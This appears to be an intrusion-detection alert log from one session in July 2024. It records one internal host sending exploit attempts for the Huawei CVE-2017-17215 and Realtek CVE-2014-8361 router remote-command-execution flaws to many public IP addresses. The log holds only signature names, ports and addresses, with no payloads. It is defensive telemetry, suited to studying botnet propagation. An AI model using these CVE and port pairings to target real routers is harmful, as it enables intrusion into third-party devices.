                                      07/20/24-23:01:07.004907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614437215192.168.2.2357.18.83.1
                                      07/20/24-23:01:08.562013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25505652869192.168.2.23212.114.230.189
                                      07/20/24-23:01:24.867858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600237215192.168.2.23208.252.51.218
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623037215192.168.2.23194.21.224.56
                                      07/20/24-23:01:00.633355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942837215192.168.2.23197.118.130.41
                                      07/20/24-23:01:08.677485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25799252869192.168.2.2365.136.207.183
                                      07/20/24-23:01:46.808111TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24980652869192.168.2.2390.112.61.164
                                      07/20/24-23:01:08.650213TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5188852869192.168.2.23132.86.136.162
                                      07/20/24-23:01:49.329747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3404052869192.168.2.2344.152.141.175
                                      07/20/24-23:01:47.569820TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25923652869192.168.2.23163.47.80.71
                                      07/20/24-23:01:01.826098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5926652869192.168.2.23135.23.236.194
                                      07/20/24-23:01:46.176757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4760652869192.168.2.23220.91.249.28
                                      07/20/24-23:01:42.627588TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195052869192.168.2.23174.16.2.141
                                      07/20/24-23:02:05.745200TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25249252869192.168.2.23104.143.173.10
                                      07/20/24-23:01:20.600303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4288852869192.168.2.23138.74.14.28
                                      07/20/24-23:01:07.026812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760637215192.168.2.2362.96.8.174
                                      07/20/24-23:01:14.049603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978437215192.168.2.23157.38.188.109
                                      07/20/24-23:01:41.229799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5951452869192.168.2.23100.0.247.159
                                      07/20/24-23:01:21.936545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360437215192.168.2.2341.20.166.185
                                      07/20/24-23:01:51.943792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4181652869192.168.2.2343.71.121.153
                                      07/20/24-23:01:31.978141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035837215192.168.2.23157.101.195.198
                                      07/20/24-23:01:49.302154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25269052869192.168.2.23190.1.92.156
                                      07/20/24-23:02:00.413915TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24951652869192.168.2.23165.63.9.134
                                      07/20/24-23:01:27.650871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953237215192.168.2.2385.60.122.132
                                      07/20/24-23:01:52.646505TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25124652869192.168.2.23141.217.152.223
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177837215192.168.2.2341.161.204.46
                                      07/20/24-23:01:24.910426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308437215192.168.2.23197.178.69.12
                                      07/20/24-23:01:08.640831TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23502652869192.168.2.23114.190.123.93
                                      07/20/24-23:01:44.795218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3836652869192.168.2.2312.154.226.190
                                      07/20/24-23:01:11.817771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6009837215192.168.2.2394.180.106.123
                                      07/20/24-23:01:42.000471TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24664852869192.168.2.23141.211.193.35
                                      07/20/24-23:01:47.023698TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25620252869192.168.2.2349.152.226.6
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131037215192.168.2.23126.71.100.246
                                      07/20/24-23:01:42.262355TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5741252869192.168.2.23129.65.153.68
                                      07/20/24-23:01:25.481306TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5679852869192.168.2.235.207.112.150
                                      07/20/24-23:01:59.449569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615807252869192.168.2.23129.15.238.37
                                      07/20/24-23:01:07.114267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167437215192.168.2.2359.163.139.170
                                      07/20/24-23:01:44.870961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4228852869192.168.2.2391.225.198.252
                                      07/20/24-23:01:08.620788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24957652869192.168.2.2387.137.214.123
                                      07/20/24-23:01:25.498619TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615657852869192.168.2.23119.38.147.179
                                      07/20/24-23:01:20.592206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23479852869192.168.2.23144.166.152.235
                                      07/20/24-23:01:44.484644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24970452869192.168.2.23105.187.39.89
                                      07/20/24-23:01:57.169212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5743852869192.168.2.23149.53.250.19
                                      07/20/24-23:01:40.331150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690437215192.168.2.23197.185.185.234
                                      07/20/24-23:01:03.126921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5272252869192.168.2.23139.37.94.236
                                      07/20/24-23:01:20.119973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329237215192.168.2.23157.0.250.177
                                      07/20/24-23:00:59.201033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698037215192.168.2.2341.75.227.101
                                      07/20/24-23:01:14.367036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4416052869192.168.2.23109.120.196.186
                                      07/20/24-23:01:21.099180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5175252869192.168.2.239.70.14.160
                                      07/20/24-23:01:27.666100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115037215192.168.2.23148.251.22.209
                                      07/20/24-23:01:50.212922TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24004052869192.168.2.23152.179.89.83
                                      07/20/24-23:01:46.591274TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23707452869192.168.2.23187.34.215.18
                                      07/20/24-23:01:44.624990TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25140452869192.168.2.23223.103.54.206
                                      07/20/24-23:01:41.263141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320052869192.168.2.23192.12.11.101
                                      07/20/24-23:02:30.172034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3821652869192.168.2.23148.112.106.138
                                      07/20/24-23:01:41.608574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5064652869192.168.2.23187.178.228.43
                                      07/20/24-23:01:41.522990TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5374652869192.168.2.23146.0.35.148
                                      07/20/24-23:01:00.633389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134037215192.168.2.23197.95.169.228
                                      07/20/24-23:01:55.870348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794052869192.168.2.2373.223.107.25
                                      07/20/24-23:01:02.104572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336837215192.168.2.2341.75.108.94
                                      07/20/24-23:01:31.976984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942237215192.168.2.23197.243.29.19
                                      07/20/24-23:01:41.758923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23562852869192.168.2.23193.15.215.48
                                      07/20/24-23:01:49.810143TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23533652869192.168.2.2334.147.70.115
                                      07/20/24-23:00:57.221017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905037215192.168.2.23203.201.15.112
                                      07/20/24-23:01:42.672378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5892652869192.168.2.23112.83.62.168
                                      07/20/24-23:01:03.813611TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614102252869192.168.2.2357.224.40.86
                                      07/20/24-23:01:46.358381TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24279452869192.168.2.23203.57.14.26
                                      07/20/24-23:01:53.524925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5639252869192.168.2.2390.72.98.132
                                      07/20/24-23:01:42.939520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5055252869192.168.2.23114.151.113.249
                                      07/20/24-23:01:52.285243TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23686652869192.168.2.2396.119.211.11
                                      07/20/24-23:01:11.816504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288837215192.168.2.2320.16.236.13
                                      07/20/24-23:01:43.035756TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613881052869192.168.2.23152.70.166.60
                                      07/20/24-23:01:55.606975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5821852869192.168.2.2364.98.234.97
                                      07/20/24-23:02:48.156942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4105452869192.168.2.23211.211.25.32
                                      07/20/24-23:01:08.599362TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25305452869192.168.2.23161.203.121.55
                                      07/20/24-23:01:49.116780TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613482252869192.168.2.23191.56.125.219
                                      07/20/24-23:01:42.740527TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24320652869192.168.2.238.243.36.237
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416037215192.168.2.2364.137.17.221
                                      07/20/24-23:01:47.821658TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615708852869192.168.2.23223.33.49.156
                                      07/20/24-23:02:18.278764TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615680852869192.168.2.2372.193.247.149
                                      07/20/24-23:01:40.291616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971837215192.168.2.2341.207.12.33
                                      07/20/24-23:01:32.028836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521837215192.168.2.23197.21.215.215
                                      07/20/24-23:01:56.304951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615428852869192.168.2.23187.63.42.28
                                      07/20/24-23:01:09.055028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5464052869192.168.2.23207.223.182.162
                                      07/20/24-23:01:11.817297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862837215192.168.2.2341.4.213.77
                                      07/20/24-23:01:27.649775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372837215192.168.2.23157.60.95.77
                                      07/20/24-23:01:48.138392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5377052869192.168.2.2397.241.192.98
                                      07/20/24-23:01:12.852602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4015052869192.168.2.2327.116.111.15
                                      07/20/24-23:01:08.630327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24492652869192.168.2.23181.219.175.178
                                      07/20/24-23:01:10.523865TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613554052869192.168.2.2360.92.43.190
                                      07/20/24-23:01:43.318305TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615304452869192.168.2.23148.119.6.34
                                      07/20/24-23:01:50.313415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4268852869192.168.2.23149.8.44.5
                                      07/20/24-23:00:59.191389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706437215192.168.2.2341.123.9.56
                                      07/20/24-23:01:20.175900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730437215192.168.2.23197.199.249.9
                                      07/20/24-23:01:43.890780TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616093652869192.168.2.2351.131.43.210
                                      07/20/24-23:01:46.773722TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23602052869192.168.2.2366.96.161.223
                                      07/20/24-23:01:42.837135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4725452869192.168.2.23204.152.123.98
                                      07/20/24-23:01:44.428891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5214652869192.168.2.23123.97.7.185
                                      07/20/24-23:01:41.378871TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615828652869192.168.2.2352.167.234.201
                                      07/20/24-23:01:08.621030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5631052869192.168.2.23136.74.174.143
                                      07/20/24-23:01:42.745085TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24737852869192.168.2.232.78.155.76
                                      07/20/24-23:01:45.143033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3423852869192.168.2.23219.30.72.57
                                      07/20/24-23:01:46.987215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5806852869192.168.2.231.176.237.99
                                      07/20/24-23:01:42.632123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708652869192.168.2.23176.127.40.36
                                      07/20/24-23:01:42.634606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23346452869192.168.2.23181.147.220.98
                                      07/20/24-23:01:34.045749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284637215192.168.2.23117.32.136.151
                                      07/20/24-23:01:40.322860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249037215192.168.2.2341.254.32.226
                                      07/20/24-23:01:50.848727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5201652869192.168.2.23170.121.46.240
                                      07/20/24-23:01:04.113037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792237215192.168.2.23157.121.210.198
                                      07/20/24-23:01:40.319856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191037215192.168.2.23109.208.87.26
                                      07/20/24-23:01:12.861753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24973652869192.168.2.23123.52.107.77
                                      07/20/24-23:01:43.058686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615307252869192.168.2.23162.142.171.159
                                      07/20/24-23:01:49.463055TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24749652869192.168.2.2318.7.171.33
                                      07/20/24-23:02:35.459810TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614899252869192.168.2.2331.72.24.180
                                      07/20/24-23:01:31.313163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5967452869192.168.2.23108.240.199.7
                                      07/20/24-23:01:52.305893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616031252869192.168.2.2396.239.240.238
                                      07/20/24-23:01:43.199406TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4328652869192.168.2.2386.216.107.76
                                      07/20/24-23:01:49.145932TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25206852869192.168.2.2359.111.61.71
                                      07/20/24-23:01:43.001716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3967052869192.168.2.23185.86.48.66
                                      07/20/24-23:01:43.170156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4040052869192.168.2.23222.227.230.240
                                      07/20/24-23:01:44.895849TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3512852869192.168.2.23125.174.13.114
                                      07/20/24-23:01:41.620386TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25067652869192.168.2.2369.103.140.112
                                      07/20/24-23:01:42.636583TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615958052869192.168.2.23153.113.97.179
                                      07/20/24-23:01:42.627588TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4140852869192.168.2.23197.132.250.53
                                      07/20/24-23:01:31.979565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093237215192.168.2.23123.35.251.224
                                      07/20/24-23:01:24.567513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613571252869192.168.2.2366.164.253.202
                                      07/20/24-23:01:53.675171TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613990852869192.168.2.23145.80.152.144
                                      07/20/24-23:01:31.317774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5799652869192.168.2.23213.71.93.224
                                      07/20/24-23:01:24.915904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141637215192.168.2.23197.139.170.13
                                      07/20/24-23:01:52.089079TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614622652869192.168.2.23119.145.77.109
                                      07/20/24-23:02:17.128771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5364852869192.168.2.2361.109.235.175
                                      07/20/24-23:00:59.187842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389437215192.168.2.2341.132.20.65
                                      07/20/24-23:01:08.600680TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23458852869192.168.2.2313.188.89.36
                                      07/20/24-23:01:43.541579TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24509052869192.168.2.23213.118.6.220
                                      07/20/24-23:01:44.464382TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614259652869192.168.2.23193.12.149.189
                                      07/20/24-23:01:04.094795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210437215192.168.2.2341.185.138.78
                                      07/20/24-23:01:58.143690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3554252869192.168.2.23192.45.244.106
                                      07/20/24-23:02:45.524183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614114652869192.168.2.23120.235.235.116
                                      07/20/24-23:01:31.325694TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23703652869192.168.2.23149.142.97.135
                                      07/20/24-23:01:11.149832TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614157652869192.168.2.2351.49.44.101
                                      07/20/24-23:00:57.222080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656237215192.168.2.23197.224.182.83
                                      07/20/24-23:01:49.693650TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616096252869192.168.2.2354.42.165.29
                                      07/20/24-23:01:58.424201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5777452869192.168.2.2398.158.142.52
                                      07/20/24-23:00:59.172943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410637215192.168.2.23197.114.117.243
                                      07/20/24-23:01:02.449592TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614337852869192.168.2.23201.173.108.254
                                      07/20/24-23:01:42.390246TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25496852869192.168.2.23189.30.194.82
                                      07/20/24-23:01:44.602081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3310452869192.168.2.23140.138.195.141
                                      07/20/24-23:01:40.296076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763637215192.168.2.23157.83.137.181
                                      07/20/24-23:01:42.501090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6080052869192.168.2.23104.116.61.223
                                      07/20/24-23:01:58.608087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3711252869192.168.2.23130.253.20.234
                                      07/20/24-23:01:11.635828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627837215192.168.2.23197.16.1.141
                                      07/20/24-23:01:44.500152TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4024452869192.168.2.23186.206.154.241
                                      07/20/24-23:01:02.395457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615266052869192.168.2.2382.99.109.50
                                      07/20/24-23:01:10.977084TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6017052869192.168.2.23183.182.103.28
                                      07/20/24-23:01:51.290278TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613310852869192.168.2.23139.158.177.85
                                      07/20/24-23:01:42.374543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615357052869192.168.2.23142.105.178.104
                                      07/20/24-23:01:41.322614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6075052869192.168.2.23197.25.236.70
                                      07/20/24-23:01:42.874808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25434852869192.168.2.23146.0.35.148
                                      07/20/24-23:01:08.578727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23599652869192.168.2.2354.235.197.43
                                      07/20/24-23:01:49.198416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4764252869192.168.2.23156.133.161.252
                                      07/20/24-23:01:57.847364TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4246652869192.168.2.2388.239.244.206
                                      07/20/24-23:01:41.193880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3430852869192.168.2.23216.159.45.191
                                      07/20/24-23:00:57.222008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555037215192.168.2.23168.165.233.141
                                      07/20/24-23:01:45.197712TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614667252869192.168.2.23153.197.120.12
                                      07/20/24-23:01:08.588009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3443652869192.168.2.232.32.130.76
                                      07/20/24-23:01:49.537827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5967052869192.168.2.23104.171.202.164
                                      07/20/24-23:00:57.220937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251037215192.168.2.23173.155.49.17
                                      07/20/24-23:01:44.533289TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614491052869192.168.2.23103.0.203.61
                                      07/20/24-23:01:01.839255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4197452869192.168.2.23159.20.45.153
                                      07/20/24-23:01:11.633481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345837215192.168.2.23157.205.78.42
                                      07/20/24-23:01:42.699478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3752652869192.168.2.23105.139.214.54
                                      07/20/24-23:01:46.552279TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4871852869192.168.2.2360.88.74.46
                                      07/20/24-23:01:08.938949TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25109052869192.168.2.23142.90.33.83
                                      07/20/24-23:01:01.308250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4730252869192.168.2.23117.49.51.0
                                      07/20/24-23:01:27.658221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745237215192.168.2.23197.38.231.207
                                      07/20/24-23:01:45.116897TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24761452869192.168.2.23208.81.102.220
                                      07/20/24-23:01:01.212254TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614872652869192.168.2.23142.90.33.83
                                      07/20/24-23:01:44.837053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4208052869192.168.2.2318.202.42.80
